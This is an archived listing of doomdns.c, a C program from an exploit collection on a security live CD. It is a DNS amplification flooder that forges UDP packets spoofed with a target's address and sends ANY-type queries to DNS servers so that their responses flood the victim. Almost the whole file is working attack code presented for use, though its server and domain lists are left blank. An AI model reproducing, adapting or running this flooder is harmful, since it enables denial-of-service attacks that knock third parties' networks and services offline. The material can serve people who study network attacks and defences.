home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Chip 2007 January, February, March & April
/
Chip-Cover-CD-2007-02.iso
/
Pakiet bezpieczenstwa
/
mini Pentoo LiveCD 2006.1
/
mpentoo-2006.1.iso
/
livecd.squashfs
/
opt
/
pentoo
/
ExploitTree
/
application
/
dns
/
doomdns.c
< prev
next >
Wrap
C/C++ Source or Header
|
2005-02-12
|
4KB
|
171 lines
/******************************************************************
* *
* DOOMDNS Yet another flooder with 1:x pkts ratio. This one *
* exploits DNS simple QUERY with spoofed UDPs. *
* Since almost every DNS is bound to answer queries *
* from the void, and since UDP doesn't provide a *
* fruitful authentication process cause plain TCP *
* does, uh !? ;) here we are. *
* *
* hints by |scacco|, code by FuSyS *
* http://www.s0ftpj.org *
* *
******************************************************************/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netdb.h>
#include <time.h>
#define IP_HEAD_BASE 20
#define UDP_HEAD_BASE 8
unsigned long saddr;
int sfd, loop;
char *dns_def[]={/* LISTA ASSENTE */ ,NULL};
char *domains[]={/* LISTA ASSENTE */ ,NULL};
struct DNS_MSG
{
HEADER head;
char query[255];
};
struct dns_pkt
{
struct iphdr ip;
struct udphdr udp;
char data[1000];
};
unsigned long nameResolve(char *hostname)
{
struct in_addr addr;
struct hostent *hostEnt;
if((addr.s_addr=inet_addr(hostname)) == -1)
{
if(!(hostEnt=gethostbyname(hostname)))
{
fprintf(stderr,"N0 SUCH H0ST:`%s`\n",hostname);
exit(0);
}
bcopy(hostEnt->h_addr,(char *)&addr.s_addr,hostEnt->h_length);
}
return addr.s_addr;
}
void forge (unsigned long daddr, unsigned short src, unsigned short dst)
{
struct sockaddr_in sin;
struct dns_pkt dpk;
struct DNS_MSG killer;
int shoot, len;
memset(&killer, 0, sizeof(killer));
killer.head.id=getpid();
killer.head.rd=1;
killer.head.aa=0;
killer.head.opcode=QUERY;
killer.head.qr=0;
killer.head.qdcount=htons(1);
killer.head.ancount=htons(0);
killer.head.nscount=htons(0);
killer.head.arcount=htons(0);
strcat(killer.query, domains[--loop]);
killer.query[strlen(domains[loop])+2]=0x00FF;
killer.query[strlen(domains[loop])+4]=0x0001;
memset(&dpk, 0, sizeof(dpk));
dpk.udp.source=src;
dpk.udp.dest=dst;
len=(12+strlen(killer.query)+5);
dpk.udp.len=htons(UDP_HEAD_BASE+len);
memcpy(dpk.data, (void*)&killer, len);
dpk.ip.ihl=5;
dpk.ip.version=4;
dpk.ip.tos=0;
dpk.ip.tot_len=htons(IP_HEAD_BASE+UDP_HEAD_BASE+len);
dpk.ip.frag_off=0;
dpk.ip.ttl=64;
dpk.ip.protocol=IPPROTO_UDP;
dpk.ip.saddr=saddr;
dpk.ip.daddr=daddr;
memset(&sin, 0, sizeof(sin));
sin.sin_family=AF_INET;
sin.sin_port=dst;
sin.sin_addr.s_addr=daddr;
shoot=sendto(sfd, &dpk,IP_HEAD_BASE+UDP_HEAD_BASE+len,
0, (struct sockaddr *)&sin, sizeof(sin));
if(shoot<0)fprintf(stderr, "SPOOF ERROR");
loop++;
}
void doomzone (void)
{
unsigned long daddr;
unsigned short source, dest;
if(dns_def[loop]==NULL) loop=0;
daddr=nameResolve(dns_def[loop++]);
source=htons(1024+(rand()%2000));
dest=htons(53);
forge(daddr, source, dest);
}
int main (int argc, char **argv)
{
int sfdo;
unsigned int hz=100;
if(argc<2)
{
fprintf(stderr, "Interesting .... let's flood ourselves ?!\n");
fprintf(stderr, "Use: %s target [n]\n", argv[0]);
exit(0);
}
if(argv[2]) hz=atoi(argv[2]);
saddr=nameResolve(argv[1]);
srand(time(NULL));
if((sfd=socket(AF_INET, SOCK_RAW, IPPROTO_RAW))<0)
{
fprintf(stderr, "\nSOCK_RAW Died\n");
exit(2);
}
sfdo=1;
if(setsockopt(sfd, IPPROTO_IP, IP_HDRINCL, &sfdo, sizeof(sfdo))<0)
{
fprintf(stderr, "\nIP_HDRINCL Died\n");
exit(3);
}
printf("\n\033[1;32mD00M DNS\033[0m");
printf("\n\033[1;34mDNS Flooder by FuSyS\033[0m");
printf("\n\033[1;34minithints by |scacco|\033[0m\n\n");
loop=0;
while(hz--)
{
doomzone();
printf("\033[1;34m.\033[0m");
}
printf("\n\n");
return(0);
}
/* www.hack.co.za [2000]*/
